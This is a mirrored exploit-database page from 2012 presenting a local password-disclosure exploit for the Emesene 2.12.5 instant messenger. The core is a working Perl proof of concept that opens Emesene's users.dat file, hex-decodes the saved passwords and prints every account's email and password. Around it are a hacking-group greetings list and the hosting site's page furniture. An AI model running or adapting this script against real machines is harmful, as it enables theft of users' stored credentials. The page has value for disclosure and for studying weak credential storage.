Emesene 2.12.5 Password Disclosure

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Emesene 2.12.5 Password Disclosure

来源：www.delincuentedigital.com.ar 作者：Godoy 发布时间：2012-07-02

# Exploit Title: Emesene Password Disclosure
# Category: Local
# Date: 29/06/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web: http://blog.emesene.org/p/downloads.html
# Tested on: Linux

The only requirement to run the script is that the customer is
highlighted remember password.

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group

[PoC]

#!/usr/bin/perl
#/home/$HOME/.config/emesene1.0
system("clear");
print "[ EMESENE PASSWORD DISCLOSURE ]\n";
print "TESTED ON UBUNTU 10.04 LTS\n";
my $pwn="users.dat";
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";
$cantidad++ while <ENTRADA>;
close (ENTRADA);
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";
@source = <ENTRADA>;
for($i = 0; $i < $cantidad; $i++)
    {
    @password= split(":", $source[$i]);
    print "Mail: ".$password[0]." Password PWND! => ";
    print pack("H*", $password[1]), "\n";
    }
close (ENTRADA);

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告